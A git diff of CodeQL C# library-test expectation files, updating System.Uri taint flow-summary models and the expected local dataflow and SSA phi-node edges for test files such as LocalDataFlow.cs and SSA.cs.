System;Uri;UnescapeDataString;(System.String);Argument[0];ReturnValue;value;dfc-generated | | System;Uri;Uri;(System.String);Argument[0];Argument[this];taint;manual | | System;Uri;Uri;(System.String,System.Boolean);Argument[0];Argument[this];taint;manual | -| System;Uri;Uri;(System.String,System.UriCreationOptions);Argument[0];Argument[this].SyntheticField[System.Uri._string];value;dfc-generated | +| System;Uri;Uri;(System.String,System.UriCreationOptions);Argument[0];Argument[this];taint;manual | | System;Uri;Uri;(System.String,System.UriKind);Argument[0];Argument[this];taint;manual | -| System;Uri;Uri;(System.Uri,System.String);Argument[1];Argument[this].SyntheticField[System.Uri._string];value;dfc-generated | -| System;Uri;Uri;(System.Uri,System.String,System.Boolean);Argument[1];Argument[this].SyntheticField[System.Uri._string];value;dfc-generated | +| System;Uri;Uri;(System.Uri,System.String);Argument[0];Argument[this];taint;manual | +| System;Uri;Uri;(System.Uri,System.String);Argument[1];Argument[this];taint;manual | +| System;Uri;Uri;(System.Uri,System.String,System.Boolean);Argument[0];Argument[this];taint;manual | +| System;Uri;Uri;(System.Uri,System.String,System.Boolean);Argument[1];Argument[this];taint;manual | | System;Uri;Uri;(System.Uri,System.Uri);Argument[0];Argument[this];taint;df-generated | | System;Uri;Uri;(System.Uri,System.Uri);Argument[1];Argument[this];taint;df-generated | | System;Uri;get_AbsolutePath;();Argument[this];ReturnValue;taint;df-generated | +| System;Uri;get_AbsoluteUri;();Argument[this];ReturnValue;taint;manual | | System;Uri;get_Authority;();Argument[this];ReturnValue;taint;df-generated | -| System;Uri;get_DnsSafeHost;();Argument[this].Property[System.Uri.IdnHost];ReturnValue;value;dfc-generated | +| System;Uri;get_DnsSafeHost;();Argument[this];ReturnValue;taint;manual | | System;Uri;get_Host;();Argument[this];ReturnValue;taint;df-generated | | System;Uri;get_IdnHost;();Argument[this];ReturnValue;taint;df-generated | -| System;Uri;get_LocalPath;();Argument[this].SyntheticField[System.Uri._string];ReturnValue;value;dfc-generated | +| System;Uri;get_LocalPath;();Argument[this];ReturnValue;taint;manual | | System;Uri;get_OriginalString;();Argument[this];ReturnValue;taint;manual | | System;Uri;get_PathAndQuery;();Argument[this];ReturnValue;taint;manual | | System;Uri;get_Query;();Argument[this];ReturnValue;taint;manual | diff --git a/csharp/ql/test/library-tests/dataflow/local/DataFlowStep.expected b/csharp/ql/test/library-tests/dataflow/local/DataFlowStep.expected index 9e488197e7c1..7dc5e3e46360 100644 --- a/csharp/ql/test/library-tests/dataflow/local/DataFlowStep.expected +++ b/csharp/ql/test/library-tests/dataflow/local/DataFlowStep.expected @@ -72,11 +72,10 @@ | LocalDataFlow.cs:88:9:88:16 | access to local variable nonSink0 | LocalDataFlow.cs:88:9:88:36 | SSA def(nonSink0) | | LocalDataFlow.cs:88:9:88:36 | SSA def(nonSink0) | LocalDataFlow.cs:89:15:89:22 | access to local variable nonSink0 | | LocalDataFlow.cs:88:20:88:36 | ... ? ... : ... | LocalDataFlow.cs:88:9:88:16 | access to local variable nonSink0 | -| LocalDataFlow.cs:88:20:88:36 | SSA phi(sink7) | LocalDataFlow.cs:92:29:92:33 | access to local variable sink7 | | LocalDataFlow.cs:88:24:88:28 | "abc" | LocalDataFlow.cs:88:20:88:36 | ... ? ... : ... | -| LocalDataFlow.cs:88:24:88:28 | [input] SSA phi(sink7) | LocalDataFlow.cs:88:20:88:36 | SSA phi(sink7) | +| LocalDataFlow.cs:88:24:88:28 | [input] SSA phi(sink7) | LocalDataFlow.cs:92:29:92:33 | access to local variable sink7 | | LocalDataFlow.cs:88:32:88:36 | "def" | LocalDataFlow.cs:88:20:88:36 | ... ? ... : ... | -| LocalDataFlow.cs:88:32:88:36 | [input] SSA phi(sink7) | LocalDataFlow.cs:88:20:88:36 | SSA phi(sink7) | +| LocalDataFlow.cs:88:32:88:36 | [input] SSA phi(sink7) | LocalDataFlow.cs:92:29:92:33 | access to local variable sink7 | | LocalDataFlow.cs:89:15:89:22 | [post] access to local variable nonSink0 | LocalDataFlow.cs:96:32:96:39 | access to local variable nonSink0 | | LocalDataFlow.cs:89:15:89:22 | access to local variable nonSink0 | LocalDataFlow.cs:96:32:96:39 | access to local variable nonSink0 | | LocalDataFlow.cs:92:13:92:17 | access to local variable sink8 | LocalDataFlow.cs:92:13:92:33 | SSA def(sink8) | @@ -480,14 +479,12 @@ | LocalDataFlow.cs:307:18:307:33 | String nonSink17 | LocalDataFlow.cs:307:18:307:33 | SSA def(nonSink17) | | LocalDataFlow.cs:313:13:313:18 | access to local variable sink73 | LocalDataFlow.cs:313:13:313:38 | SSA def(sink73) | | LocalDataFlow.cs:313:13:313:38 | SSA def(sink73) | LocalDataFlow.cs:315:15:315:20 | access to local variable sink73 | -| LocalDataFlow.cs:313:22:313:29 | [input] SSA phi read(sink0) | LocalDataFlow.cs:313:22:313:38 | SSA phi read(sink0) | +| LocalDataFlow.cs:313:22:313:29 | [input] SSA phi read(sink0) | LocalDataFlow.cs:314:22:314:26 | access to local variable sink0 | | LocalDataFlow.cs:313:22:313:29 | access to local variable nonSink0 | LocalDataFlow.cs:313:22:313:38 | ... ?? ... | | LocalDataFlow.cs:313:22:313:29 | access to local variable nonSink0 | LocalDataFlow.cs:314:31:314:38 | access to local variable nonSink0 | | LocalDataFlow.cs:313:22:313:38 | ... ?? ... | LocalDataFlow.cs:313:13:313:18 | access to local variable sink73 | -| LocalDataFlow.cs:313:22:313:38 | SSA phi read(sink0) | LocalDataFlow.cs:314:22:314:26 | access to local variable sink0 | -| LocalDataFlow.cs:313:34:313:38 | [input] SSA phi read(sink0) | LocalDataFlow.cs:313:22:313:38 | SSA phi read(sink0) | | LocalDataFlow.cs:313:34:313:38 | access to local variable sink0 | LocalDataFlow.cs:313:22:313:38 | ... ?? ... | -| LocalDataFlow.cs:313:34:313:38 | access to local variable sink0 | LocalDataFlow.cs:313:34:313:38 | [input] SSA phi read(sink0) | +| LocalDataFlow.cs:313:34:313:38 | access to local variable sink0 | LocalDataFlow.cs:314:22:314:26 | access to local variable sink0 | | LocalDataFlow.cs:314:13:314:18 | access to local variable sink74 | LocalDataFlow.cs:314:13:314:38 | SSA def(sink74) | | LocalDataFlow.cs:314:13:314:38 | SSA def(sink74) | LocalDataFlow.cs:316:15:316:20 | access to local variable sink74 | | LocalDataFlow.cs:314:22:314:26 | access to local variable sink0 | LocalDataFlow.cs:314:22:314:38 | ... ?? ... | @@ -526,12 +523,10 @@ | LocalDataFlow.cs:373:13:373:25 | SSA def(x) | LocalDataFlow.cs:374:17:374:18 | [input] SSA phi(x) | | LocalDataFlow.cs:373:13:373:25 | SSA def(x) | LocalDataFlow.cs:376:35:376:35 | access to local variable x | | LocalDataFlow.cs:373:17:373:25 | "tainted" | LocalDataFlow.cs:373:13:373:13 | access to local variable x | -| LocalDataFlow.cs:374:17:374:18 | [input] SSA phi(x) | LocalDataFlow.cs:382:9:382:17 | SSA phi(x) | +| LocalDataFlow.cs:374:17:374:18 | [input] SSA phi(x) | LocalDataFlow.cs:382:15:382:15 | access to local variable x | | LocalDataFlow.cs:381:13:381:13 | access to local variable x | LocalDataFlow.cs:381:13:381:29 | SSA def(x) | -| LocalDataFlow.cs:381:13:381:29 | SSA def(x) | LocalDataFlow.cs:381:13:381:29 | [input] SSA phi(x) | -| LocalDataFlow.cs:381:13:381:29 | [input] SSA phi(x) | LocalDataFlow.cs:382:9:382:17 | SSA phi(x) | +| LocalDataFlow.cs:381:13:381:29 | SSA def(x) | LocalDataFlow.cs:382:15:382:15 | access to local variable x | | LocalDataFlow.cs:381:17:381:29 | "not tainted" | LocalDataFlow.cs:381:13:381:13 | access to local variable x | -| LocalDataFlow.cs:382:9:382:17 | SSA phi(x) | LocalDataFlow.cs:382:15:382:15 | access to local variable x | | SSA.cs:5:17:5:17 | SSA entry def(this.S) | SSA.cs:67:9:67:14 | access to field S | | SSA.cs:5:17:5:17 | this | SSA.cs:67:9:67:12 | this access | | SSA.cs:5:26:5:32 | SSA param(tainted) | SSA.cs:8:24:8:30 | access to parameter tainted | @@ -559,47 +554,38 @@ | SSA.cs:19:13:19:20 | access to local variable nonSink0 | SSA.cs:29:13:29:33 | [input] SSA phi read(nonSink0) | | SSA.cs:19:13:19:20 | access to local variable nonSink0 | SSA.cs:30:24:30:31 | access to local variable nonSink0 | | SSA.cs:22:16:22:23 | access to local variable ssaSink1 | SSA.cs:22:16:22:28 | SSA def(ssaSink1) | -| SSA.cs:22:16:22:28 | SSA def(ssaSink1) | SSA.cs:23:13:23:33 | [input] SSA phi(ssaSink1) | +| SSA.cs:22:16:22:28 | SSA def(ssaSink1) | SSA.cs:25:15:25:22 | access to local variable ssaSink1 | | SSA.cs:22:27:22:28 | "" | SSA.cs:22:16:22:23 | access to local variable ssaSink1 | | SSA.cs:23:13:23:22 | [post] access to parameter nonTainted | SSA.cs:29:13:29:22 | access to parameter nonTainted | | SSA.cs:23:13:23:22 | access to parameter nonTainted | SSA.cs:29:13:29:22 | access to parameter nonTainted | | SSA.cs:23:13:23:33 | [input] SSA phi read(ssaSink0) | SSA.cs:25:9:25:24 | SSA phi read(ssaSink0) | -| SSA.cs:23:13:23:33 | [input] SSA phi(ssaSink1) | SSA.cs:25:9:25:24 | SSA phi(ssaSink1) | | SSA.cs:24:13:24:20 | access to local variable ssaSink1 | SSA.cs:24:13:24:31 | SSA def(ssaSink1) | -| SSA.cs:24:13:24:31 | SSA def(ssaSink1) | SSA.cs:24:13:24:31 | [input] SSA phi(ssaSink1) | -| SSA.cs:24:13:24:31 | [input] SSA phi read(ssaSink0) | SSA.cs:25:9:25:24 | SSA phi read(ssaSink0) | -| SSA.cs:24:13:24:31 | [input] SSA phi(ssaSink1) | SSA.cs:25:9:25:24 | SSA phi(ssaSink1) | +| SSA.cs:24:13:24:31 | SSA def(ssaSink1) | SSA.cs:25:15:25:22 | access to local variable ssaSink1 | | SSA.cs:24:24:24:31 | access to local variable ssaSink0 | SSA.cs:24:13:24:20 | access to local variable ssaSink1 | -| SSA.cs:24:24:24:31 | access to local variable ssaSink0 | SSA.cs:24:13:24:31 | [input] SSA phi read(ssaSink0) | +| SSA.cs:24:24:24:31 | access to local variable ssaSink0 | SSA.cs:25:9:25:24 | SSA phi read(ssaSink0) | | SSA.cs:25:9:25:24 | SSA phi read(ssaSink0) | SSA.cs:35:13:35:33 | [input] SSA phi read(ssaSink0) | | SSA.cs:25:9:25:24 | SSA phi read(ssaSink0) | SSA.cs:37:24:37:31 | access to local variable ssaSink0 | -| SSA.cs:25:9:25:24 | SSA phi(ssaSink1) | SSA.cs:25:15:25:22 | access to local variable ssaSink1 | | SSA.cs:28:16:28:23 | access to local variable nonSink1 | SSA.cs:28:16:28:28 | SSA def(nonSink1) | -| SSA.cs:28:16:28:28 | SSA def(nonSink1) | SSA.cs:29:13:29:33 | [input] SSA phi(nonSink1) | +| SSA.cs:28:16:28:28 | SSA def(nonSink1) | SSA.cs:31:15:31:22 | access to local variable nonSink1 | | SSA.cs:28:27:28:28 | "" | SSA.cs:28:16:28:23 | access to local variable nonSink1 | | SSA.cs:29:13:29:22 | [post] access to parameter nonTainted | SSA.cs:35:13:35:22 | access to parameter nonTainted | | SSA.cs:29:13:29:22 | access to parameter nonTainted | SSA.cs:35:13:35:22 | access to parameter nonTainted | | SSA.cs:29:13:29:33 | [input] SSA phi read(nonSink0) | SSA.cs:31:9:31:24 | SSA phi read(nonSink0) | -| SSA.cs:29:13:29:33 | [input] SSA phi(nonSink1) | SSA.cs:31:9:31:24 | SSA phi(nonSink1) | | SSA.cs:30:13:30:20 | access to local variable nonSink1 | SSA.cs:30:13:30:31 | SSA def(nonSink1) | -| SSA.cs:30:13:30:31 | SSA def(nonSink1) | SSA.cs:30:13:30:31 | [input] SSA phi(nonSink1) | -| SSA.cs:30:13:30:31 | [input] SSA phi read(nonSink0) | SSA.cs:31:9:31:24 | SSA phi read(nonSink0) | -| SSA.cs:30:13:30:31 | [input] SSA phi(nonSink1) | SSA.cs:31:9:31:24 | SSA phi(nonSink1) | +| SSA.cs:30:13:30:31 | SSA def(nonSink1) | SSA.cs:31:15:31:22 | access to local variable nonSink1 | | SSA.cs:30:24:30:31 | access to local variable nonSink0 | SSA.cs:30:13:30:20 | access to local variable nonSink1 | -| SSA.cs:30:24:30:31 | access to local variable nonSink0 | SSA.cs:30:13:30:31 | [input] SSA phi read(nonSink0) | +| SSA.cs:30:24:30:31 | access to local variable nonSink0 | SSA.cs:31:9:31:24 | SSA phi read(nonSink0) | | SSA.cs:31:9:31:24 | SSA phi read(nonSink0) | SSA.cs:47:13:47:33 | [input] SSA phi read(nonSink0) | | SSA.cs:31:9:31:24 | SSA phi read(nonSink0) | SSA.cs:49:24:49:31 | access to local variable nonSink0 | -| SSA.cs:31:9:31:24 | SSA phi(nonSink1) | SSA.cs:31:15:31:22 | access to local variable nonSink1 | | SSA.cs:34:16:34:23 | access to local variable ssaSink2 | SSA.cs:34:16:34:28 | SSA def(ssaSink2) | -| SSA.cs:34:16:34:28 | SSA def(ssaSink2) | SSA.cs:35:13:35:33 | [input] SSA phi(ssaSink2) | +| SSA.cs:34:16:34:28 | SSA def(ssaSink2) | SSA.cs:43:15:43:22 | access to local variable ssaSink2 | | SSA.cs:34:27:34:28 | "" | SSA.cs:34:16:34:23 | access to local variable ssaSink2 | | SSA.cs:35:13:35:22 | [post] access to parameter nonTainted | SSA.cs:35:13:35:33 | [input] SSA phi read(nonTainted) | | SSA.cs:35:13:35:22 | [post] access to parameter nonTainted | SSA.cs:38:17:38:26 | access to parameter nonTainted | | SSA.cs:35:13:35:22 | access to parameter nonTainted | SSA.cs:35:13:35:33 | [input] SSA phi read(nonTainted) | | SSA.cs:35:13:35:22 | access to parameter nonTainted | SSA.cs:38:17:38:26 | access to parameter nonTainted | -| SSA.cs:35:13:35:33 | [input] SSA phi read(nonTainted) | SSA.cs:43:9:43:24 | SSA phi read(nonTainted) | +| SSA.cs:35:13:35:33 | [input] SSA phi read(nonTainted) | SSA.cs:47:13:47:22 | access to parameter nonTainted | | SSA.cs:35:13:35:33 | [input] SSA phi read(ssaSink0) | SSA.cs:43:9:43:24 | SSA phi read(ssaSink0) | -| SSA.cs:35:13:35:33 | [input] SSA phi(ssaSink2) | SSA.cs:43:9:43:24 | SSA phi(ssaSink2) | | SSA.cs:37:13:37:20 | access to local variable ssaSink2 | SSA.cs:37:13:37:31 | SSA def(ssaSink2) | | SSA.cs:37:13:37:31 | SSA def(ssaSink2) | SSA.cs:39:21:39:28 | access to local variable ssaSink2 | | SSA.cs:37:13:37:31 | SSA def(ssaSink2) | SSA.cs:41:21:41:28 | access to local variable ssaSink2 | @@ -610,30 +596,25 @@ | SSA.cs:38:17:38:26 | [post] access to parameter nonTainted | SSA.cs:41:17:41:29 | [input] SSA phi read(nonTainted) | | SSA.cs:38:17:38:26 | access to parameter nonTainted | SSA.cs:39:17:39:29 | [input] SSA phi read(nonTainted) | | SSA.cs:38:17:38:26 | access to parameter nonTainted | SSA.cs:41:17:41:29 | [input] SSA phi read(nonTainted) | -| SSA.cs:39:17:39:29 | [input] SSA phi read(nonTainted) | SSA.cs:43:9:43:24 | SSA phi read(nonTainted) | +| SSA.cs:39:17:39:29 | [input] SSA phi read(nonTainted) | SSA.cs:47:13:47:22 | access to parameter nonTainted | | SSA.cs:39:17:39:29 | [input] SSA phi read(ssaSink0) | SSA.cs:43:9:43:24 | SSA phi read(ssaSink0) | -| SSA.cs:39:17:39:29 | [input] SSA phi(ssaSink2) | SSA.cs:43:9:43:24 | SSA phi(ssaSink2) | -| SSA.cs:39:21:39:28 | [post] access to local variable ssaSink2 | SSA.cs:39:17:39:29 | [input] SSA phi(ssaSink2) | -| SSA.cs:39:21:39:28 | access to local variable ssaSink2 | SSA.cs:39:17:39:29 | [input] SSA phi(ssaSink2) | -| SSA.cs:41:17:41:29 | [input] SSA phi read(nonTainted) | SSA.cs:43:9:43:24 | SSA phi read(nonTainted) | +| SSA.cs:39:21:39:28 | [post] access to local variable ssaSink2 | SSA.cs:43:15:43:22 | access to local variable ssaSink2 | +| SSA.cs:39:21:39:28 | access to local variable ssaSink2 | SSA.cs:43:15:43:22 | access to local variable ssaSink2 | +| SSA.cs:41:17:41:29 | [input] SSA phi read(nonTainted) | SSA.cs:47:13:47:22 | access to parameter nonTainted | | SSA.cs:41:17:41:29 | [input] SSA phi read(ssaSink0) | SSA.cs:43:9:43:24 | SSA phi read(ssaSink0) | -| SSA.cs:41:17:41:29 | [input] SSA phi(ssaSink2) | SSA.cs:43:9:43:24 | SSA phi(ssaSink2) | -| SSA.cs:41:21:41:28 | [post] access to local variable ssaSink2 | SSA.cs:41:17:41:29 | [input] SSA phi(ssaSink2) | -| SSA.cs:41:21:41:28 | access to local variable ssaSink2 | SSA.cs:41:17:41:29 | [input] SSA phi(ssaSink2) | -| SSA.cs:43:9:43:24 | SSA phi read(nonTainted) | SSA.cs:47:13:47:22 | access to parameter nonTainted | +| SSA.cs:41:21:41:28 | [post] access to local variable ssaSink2 | SSA.cs:43:15:43:22 | access to local variable ssaSink2 | +| SSA.cs:41:21:41:28 | access to local variable ssaSink2 | SSA.cs:43:15:43:22 | access to local variable ssaSink2 | | SSA.cs:43:9:43:24 | SSA phi read(ssaSink0) | SSA.cs:89:13:89:33 | [input] SSA phi read(ssaSink0) | | SSA.cs:43:9:43:24 | SSA phi read(ssaSink0) | SSA.cs:91:24:91:31 | access to local variable ssaSink0 | -| SSA.cs:43:9:43:24 | SSA phi(ssaSink2) | SSA.cs:43:15:43:22 | access to local variable ssaSink2 | | SSA.cs:46:16:46:23 | access to local variable nonSink2 | SSA.cs:46:16:46:28 | SSA def(nonSink2) | -| SSA.cs:46:16:46:28 | SSA def(nonSink2) | SSA.cs:47:13:47:33 | [input] SSA phi(nonSink2) | +| SSA.cs:46:16:46:28 | SSA def(nonSink2) | SSA.cs:55:15:55:22 | access to local variable nonSink2 | | SSA.cs:46:27:46:28 | "" | SSA.cs:46:16:46:23 | access to local variable nonSink2 | | SSA.cs:47:13:47:22 | [post] access to parameter nonTainted | SSA.cs:47:13:47:33 | [input] SSA phi read(nonTainted) | | SSA.cs:47:13:47:22 | [post] access to parameter nonTainted | SSA.cs:50:17:50:26 | access to parameter nonTainted | | SSA.cs:47:13:47:22 | access to parameter nonTainted | SSA.cs:47:13:47:33 | [input] SSA phi read(nonTainted) | | SSA.cs:47:13:47:22 | access to parameter nonTainted | SSA.cs:50:17:50:26 | access to parameter nonTainted | -| SSA.cs:47:13:47:33 | [input] SSA phi read(nonSink0) | SSA.cs:55:9:55:24 | SSA phi read(nonSink0) | -| SSA.cs:47:13:47:33 | [input] SSA phi read(nonTainted) | SSA.cs:55:9:55:24 | SSA phi read(nonTainted) | -| SSA.cs:47:13:47:33 | [input] SSA phi(nonSink2) | SSA.cs:55:9:55:24 | SSA phi(nonSink2) | +| SSA.cs:47:13:47:33 | [input] SSA phi read(nonSink0) | SSA.cs:63:23:63:30 | access to local variable nonSink0 | +| SSA.cs:47:13:47:33 | [input] SSA phi read(nonTainted) | SSA.cs:89:13:89:22 | access to parameter nonTainted | | SSA.cs:49:13:49:20 | access to local variable nonSink2 | SSA.cs:49:13:49:31 | SSA def(nonSink2) | | SSA.cs:49:13:49:31 | SSA def(nonSink2) | SSA.cs:51:21:51:28 | access to local variable nonSink2 | | SSA.cs:49:13:49:31 | SSA def(nonSink2) | SSA.cs:53:21:53:28 | access to local variable nonSink2 | @@ -644,19 +625,14 @@ | SSA.cs:50:17:50:26 | [post] access to parameter nonTainted | SSA.cs:53:17:53:29 | [input] SSA phi read(nonTainted) | | SSA.cs:50:17:50:26 | access to parameter nonTainted | SSA.cs:51:17:51:29 | [input] SSA phi read(nonTainted) | | SSA.cs:50:17:50:26 | access to parameter nonTainted | SSA.cs:53:17:53:29 | [input] SSA phi read(nonTainted) | -| SSA.cs:51:17:51:29 | [input] SSA phi read(nonSink0) | SSA.cs:55:9:55:24 | SSA phi read(nonSink0) | -| SSA.cs:51:17:51:29 | [input] SSA phi read(nonTainted) | SSA.cs:55:9:55:24 | SSA phi read(nonTainted) | -| SSA.cs:51:17:51:29 | [input] SSA phi(nonSink2) | SSA.cs:55:9:55:24 | SSA phi(nonSink2) | -| SSA.cs:51:21:51:28 | [post] access to local variable nonSink2 | SSA.cs:51:17:51:29 | [input] SSA phi(nonSink2) | -| SSA.cs:51:21:51:28 | access to local variable nonSink2 | SSA.cs:51:17:51:29 | [input] SSA phi(nonSink2) | -| SSA.cs:53:17:53:29 | [input] SSA phi read(nonSink0) | SSA.cs:55:9:55:24 | SSA phi read(nonSink0) | -| SSA.cs:53:17:53:29 | [input] SSA phi read(nonTainted) | SSA.cs:55:9:55:24 | SSA phi read(nonTainted) | -| SSA.cs:53:17:53:29 | [input] SSA phi(nonSink2) | SSA.cs:55:9:55:24 | SSA phi(nonSink2) | -| SSA.cs:53:21:53:28 | [post] access to local variable nonSink2 | SSA.cs:53:17:53:29 | [input] SSA phi(nonSink2) | -| SSA.cs:53:21:53:28 | access to local variable nonSink2 | SSA.cs:53:17:53:29 | [input] SSA phi(nonSink2) | -| SSA.cs:55:9:55:24 | SSA phi read(nonSink0) | SSA.cs:63:23:63:30 | access to local variable nonSink0 | -| SSA.cs:55:9:55:24 | SSA phi read(nonTainted) | SSA.cs:89:13:89:22 | access to parameter nonTainted | -| SSA.cs:55:9:55:24 | SSA phi(nonSink2) | SSA.cs:55:15:55:22 | access to local variable nonSink2 | +| SSA.cs:51:17:51:29 | [input] SSA phi read(nonSink0) | SSA.cs:63:23:63:30 | access to local variable nonSink0 | +| SSA.cs:51:17:51:29 | [input] SSA phi read(nonTainted) | SSA.cs:89:13:89:22 | access to parameter nonTainted | +| SSA.cs:51:21:51:28 | [post] access to local variable nonSink2 | SSA.cs:55:15:55:22 | access to local variable nonSink2 | +| SSA.cs:51:21:51:28 | access to local variable nonSink2 | SSA.cs:55:15:55:22 | access to local variable nonSink2 | +| SSA.cs:53:17:53:29 | [input] SSA phi read(nonSink0) | SSA.cs:63:23:63:30 | access to local variable nonSink0 | +| SSA.cs:53:17:53:29 | [input] SSA phi read(nonTainted) | SSA.cs:89:13:89:22 | access to parameter nonTainted | +| SSA.cs:53:21:53:28 | [post] access to local variable nonSink2 | SSA.cs:55:15:55:22 | access to local variable nonSink2 | +| SSA.cs:53:21:53:28 | access to local variable nonSink2 | SSA.cs:55:15:55:22 | access to local variable nonSink2 | | SSA.cs:58:16:58:23 | access to local variable ssaSink3 | SSA.cs:58:16:58:33 | SSA def(ssaSink3) | | SSA.cs:58:16:58:33 | SSA def(ssaSink3) | SSA.cs:59:23:59:30 | access to local variable ssaSink3 | | SSA.cs:58:27:58:33 | access to parameter tainted | SSA.cs:58:16:58:23 | access to local variable ssaSink3 | @@ -744,15 +720,14 @@ | SSA.cs:85:15:85:20 | [post] access to field S | SSA.cs:114:9:114:14 | access to field S | | SSA.cs:85:15:85:20 | access to field S | SSA.cs:114:9:114:14 | access to field S | | SSA.cs:88:16:88:23 | access to local variable ssaSink4 | SSA.cs:88:16:88:28 | SSA def(ssaSink4) | -| SSA.cs:88:16:88:28 | SSA def(ssaSink4) | SSA.cs:89:13:89:33 | [input] SSA phi(ssaSink4) | +| SSA.cs:88:16:88:28 | SSA def(ssaSink4) | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | | SSA.cs:88:27:88:28 | "" | SSA.cs:88:16:88:23 | access to local variable ssaSink4 | | SSA.cs:89:13:89:22 | [post] access to parameter nonTainted | SSA.cs:89:13:89:33 | [input] SSA phi read(nonTainted) | | SSA.cs:89:13:89:22 | [post] access to parameter nonTainted | SSA.cs:92:17:92:26 | access to parameter nonTainted | | SSA.cs:89:13:89:22 | access to parameter nonTainted | SSA.cs:89:13:89:33 | [input] SSA phi read(nonTainted) | | SSA.cs:89:13:89:22 | access to parameter nonTainted | SSA.cs:92:17:92:26 | access to parameter nonTainted | -| SSA.cs:89:13:89:33 | [input] SSA phi read(nonTainted) | SSA.cs:97:9:97:32 | SSA phi read(nonTainted) | -| SSA.cs:89:13:89:33 | [input] SSA phi read(ssaSink0) | SSA.cs:97:9:97:32 | SSA phi read(ssaSink0) | -| SSA.cs:89:13:89:33 | [input] SSA phi(ssaSink4) | SSA.cs:97:9:97:32 | SSA phi(ssaSink4) | +| SSA.cs:89:13:89:33 | [input] SSA phi read(nonTainted) | SSA.cs:102:13:102:22 | access to parameter nonTainted | +| SSA.cs:89:13:89:33 | [input] SSA phi read(ssaSink0) | SSA.cs:117:36:117:43 | access to local variable ssaSink0 | | SSA.cs:91:13:91:20 | access to local variable ssaSink4 | SSA.cs:91:13:91:31 | SSA def(ssaSink4) | | SSA.cs:91:13:91:31 | SSA def(ssaSink4) | SSA.cs:93:21:93:28 | access to local variable ssaSink4 | | SSA.cs:91:13:91:31 | SSA def(ssaSink4) | SSA.cs:95:21:95:28 | access to local variable ssaSink4 | @@ -763,33 +738,27 @@ | SSA.cs:92:17:92:26 | [post] access to parameter nonTainted | SSA.cs:95:17:95:29 | [input] SSA phi read(nonTainted) | | SSA.cs:92:17:92:26 | access to parameter nonTainted | SSA.cs:93:17:93:29 | [input] SSA phi read(nonTainted) | | SSA.cs:92:17:92:26 | access to parameter nonTainted | SSA.cs:95:17:95:29 | [input] SSA phi read(nonTainted) | -| SSA.cs:93:17:93:29 | [input] SSA phi read(nonTainted) | SSA.cs:97:9:97:32 | SSA phi read(nonTainted) | -| SSA.cs:93:17:93:29 | [input] SSA phi read(ssaSink0) | SSA.cs:97:9:97:32 | SSA phi read(ssaSink0) | -| SSA.cs:93:17:93:29 | [input] SSA phi(ssaSink4) | SSA.cs:97:9:97:32 | SSA phi(ssaSink4) | -| SSA.cs:93:21:93:28 | [post] access to local variable ssaSink4 | SSA.cs:93:17:93:29 | [input] SSA phi(ssaSink4) | -| SSA.cs:93:21:93:28 | access to local variable ssaSink4 | SSA.cs:93:17:93:29 | [input] SSA phi(ssaSink4) | -| SSA.cs:95:17:95:29 | [input] SSA phi read(nonTainted) | SSA.cs:97:9:97:32 | SSA phi read(nonTainted) | -| SSA.cs:95:17:95:29 | [input] SSA phi read(ssaSink0) | SSA.cs:97:9:97:32 | SSA phi read(ssaSink0) | -| SSA.cs:95:17:95:29 | [input] SSA phi(ssaSink4) | SSA.cs:97:9:97:32 | SSA phi(ssaSink4) | -| SSA.cs:95:21:95:28 | [post] access to local variable ssaSink4 | SSA.cs:95:17:95:29 | [input] SSA phi(ssaSink4) | -| SSA.cs:95:21:95:28 | access to local variable ssaSink4 | SSA.cs:95:17:95:29 | [input] SSA phi(ssaSink4) | -| SSA.cs:97:9:97:32 | SSA phi read(nonTainted) | SSA.cs:102:13:102:22 | access to parameter nonTainted | -| SSA.cs:97:9:97:32 | SSA phi read(ssaSink0) | SSA.cs:117:36:117:43 | access to local variable ssaSink0 | -| SSA.cs:97:9:97:32 | SSA phi(ssaSink4) | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | +| SSA.cs:93:17:93:29 | [input] SSA phi read(nonTainted) | SSA.cs:102:13:102:22 | access to parameter nonTainted | +| SSA.cs:93:17:93:29 | [input] SSA phi read(ssaSink0) | SSA.cs:117:36:117:43 | access to local variable ssaSink0 | +| SSA.cs:93:21:93:28 | [post] access to local variable ssaSink4 | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | +| SSA.cs:93:21:93:28 | access to local variable ssaSink4 | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | +| SSA.cs:95:17:95:29 | [input] SSA phi read(nonTainted) | SSA.cs:102:13:102:22 | access to parameter nonTainted | +| SSA.cs:95:17:95:29 | [input] SSA phi read(ssaSink0) | SSA.cs:117:36:117:43 | access to local variable ssaSink0 | +| SSA.cs:95:21:95:28 | [post] access to local variable ssaSink4 | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | +| SSA.cs:95:21:95:28 | access to local variable ssaSink4 | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | | SSA.cs:97:23:97:30 | SSA def(ssaSink4) | SSA.cs:98:15:98:22 | access to local variable ssaSink4 | | SSA.cs:97:23:97:30 | [post] access to local variable ssaSink4 | SSA.cs:97:23:97:30 | SSA def(ssaSink4) | | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | SSA.cs:97:23:97:30 | SSA def(ssaSink4) | | SSA.cs:97:23:97:30 | access to local variable ssaSink4 | SSA.cs:97:23:97:30 | SSA def(ssaSink4) | | SSA.cs:101:16:101:23 | access to local variable nonSink3 | SSA.cs:101:16:101:28 | SSA def(nonSink3) | -| SSA.cs:101:16:101:28 | SSA def(nonSink3) | SSA.cs:102:13:102:33 | [input] SSA phi(nonSink3) | +| SSA.cs:101:16:101:28 | SSA def(nonSink3) | SSA.cs:110:23:110:30 | access to local variable nonSink3 | | SSA.cs:101:27:101:28 | "" | SSA.cs:101:16:101:23 | access to local variable nonSink3 | | SSA.cs:102:13:102:22 | [post] access to parameter nonTainted | SSA.cs:102:13:102:33 | [input] SSA phi read(nonTainted) | | SSA.cs:102:13:102:22 | [post] access to parameter nonTainted | SSA.cs:105:17:105:26 | access to parameter nonTainted | | SSA.cs:102:13:102:22 | access to parameter nonTainted | SSA.cs:102:13:102:33 | [input] SSA phi read(nonTainted) | | SSA.cs:102:13:102:22 | access to parameter nonTainted | SSA.cs:105:17:105:26 | access to parameter nonTainted | -| SSA.cs:102:13:102:33 | [input] SSA phi read(nonSink0) | SSA.cs:110:9:110:32 | SSA phi read(nonSink0) | -| SSA.cs:102:13:102:33 | [input] SSA phi read(nonTainted) | SSA.cs:110:9:110:32 | SSA phi read(nonTainted) | -| SSA.cs:102:13:102:33 | [input] SSA phi(nonSink3) | SSA.cs:110:9:110:32 | SSA phi(nonSink3) | 